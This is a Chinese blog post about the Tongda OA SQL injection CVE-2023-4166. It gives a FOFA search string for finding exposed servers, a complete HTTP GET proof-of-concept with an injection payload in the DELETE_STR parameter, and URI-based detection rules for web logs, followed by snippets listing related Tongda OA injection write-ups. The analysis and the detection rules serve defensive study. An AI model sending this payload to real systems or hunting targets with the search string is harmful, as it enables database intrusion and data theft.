SQL注入-通达OA SQL注入漏洞【CVE-2023-4166】原理及检测思路分析

已于 2024-05-09 10:06:20 修改
阅读量1.7k 收藏 1
点赞数 4
CC 4.0 BY-SA版权
分类专栏: # 攻击利用-漏洞复现 # TA0009-收集 文章标签: 网络安全
于 2024-05-08 17:12:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/summoxj/article/details/138579170

1、漏洞描述

 通达OA中发现一个漏洞,并被列为严重漏洞。该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入。

2、影响范围

  通达OA版本11.10之前

3、复现环境

 FOFA搜索:app="TDXK-通达OA" && icon_hash="-759108386",发现漏洞网站

4、POC

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1) and (substr(DATABASE(),2,1))=char(68) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4n867pmrrp4nendg0tsngl7g70; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c74d7ebb
Connection: close

5、检测思路

 -数据源:Web访问流量日志

 -检测逻辑:

  -and:

    -uri 包含 ‘/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=’

    -uri 包含 'from'

    -or:

        -uri 包含 'select'

        -uri 包含 'delete'

        -uri 包含 'update'      

漏洞复现】通达oa 前台sql注入
失心少年
11-19 729
它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
通达OA SQL注入漏洞CVE-2023-4166
holyxp的博客
08-10 6165
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞2(CVE-2023-4166)general/system/seal_manage/dianju/delete_log.php文件,对参数 DELETE_STR 的操作会导致 sql 注入
通达OA query.php SQL注入漏洞
Keepb1ue的博客
04-28 1255
通达OA(Office Automation)是一款企业级协同办公软件,旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。通达OA广泛应用于各类企业,帮助企业实现数字化转型,提高管理效率和竞争力。
通达OA SQL注入漏洞CVE-2023-4165】
holyxp的博客
08-10 3548
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞1(CVE-2023-4165)文件,对参数 DELETE_STR 的操作会导致 sql 注入
网络攻防大作业——通达OA的两个SQL注入漏洞复现(CVE-2023-4165,CVE-2023-4166
最新发布
w2361734601的博客
02-20 1789
这些漏洞存在于/general/system/seal_manage/iweboffice/delete_seal.php和/general/system/seal_manage/dianju/delete_log.php文件中,它们允许攻击者通过精心构造的输入来操纵数据库查询,执行非法的SQL命令。代码对各种常见的sql注入语句进行了过滤,通过正则表达式检测并阻止了多种类型的SQL注入攻击,包括注释、联合查询、特定函数调用、文件操作以及权限和日志设置相关的注入语句,以增强数据库操作的安全性。
通达OA sql注入漏洞.zip
08-24
`CVE-2023-4166.py`很可能是一个Python脚本,设计用于模拟攻击行为,检测或演示通达OA系统中的SQL注入漏洞。`requirements.txt`文件列出了执行此脚本所需的所有Python库,这些库可能包括网络请求工具如`requests`,...
通达oa ubmenu.php 未授权前台sql注入CVE-2024-10600)
iSee857的博客
11-17 480
通达oa在pda/appcenter/submenu.php 文件中未包含inc/auth.inc.php进行权限校验且 $appid 参数未用'包裹导致前台未授权SQL注入
通达OAretrieve_pwd.php sql注入(含批量验证poc)
weixin_43567873的博客
04-09 567
通达OAretrieve_pwd.php sql注入(含批量验证poc)
通达OA v11.7后台SQL注入
qq_44657899的博客
07-08 1805
文章目录漏洞描述漏洞影响漏洞复现 漏洞描述 通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器。 漏洞影响 通达OA <= v11.7 漏洞复现 下载通达oa 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe 漏洞位置:/general/hr/manage/query/delete_cascade.php ...
通达OA1.5SQL注入漏洞复现
weixin_51716781的博客
05-10 442
通达OA1.5漏洞复现 本文章记录初学者的笔记,仅限于渗透测试,请勿做违法操作,如出现问题与本作者无关 1:测试机上安装通达OA11.5版本:查看IP地址为:192.168.78.150 2:登录admin账号:创建一个普通职员权限 3:登录普通用户的权限,使用bp抓包:构造URL: /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 or sleep(0) 判断是否存在sql注入 4:图三
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2279
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
通达oasharehandle.phpsql注入漏洞(含批量验证poc)
weixin_43567873的博客
04-07 261
通达oasharehandle.phpsql注入漏洞(含批量验证poc)
漏洞复现-通达OA通达OA get_datas 存在前台SQL注入漏洞
xiaokp7的博客
02-18 801
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA get_datas 存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
通达OA 11.5 sql注入漏洞复现
weixin_45291045的博客
02-13 670
下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe 1.登录一个账户 2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,burp抓包 id参数存在延时注入 直接复制数据包,id参数加个*保存到sqlmap跑 python sqlmap.py -r 1.txt orderby参数 构
通达OA 11.5 SQL注入漏洞复现
Adminxe的博客
09-23 2481
0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1、下载通达OA 11.5 https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe,点击安装 2、创建一个普通账户test:test123456 3.1、id参数存在sql注入 利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入 参数位置: /general/appbuilder/web/...
通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600)
西米安全
11-21 925
pda/appcenter/submenu.php 未包含inc/auth.inc.php且 $appid 参数未用’包裹导致前台SQL注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值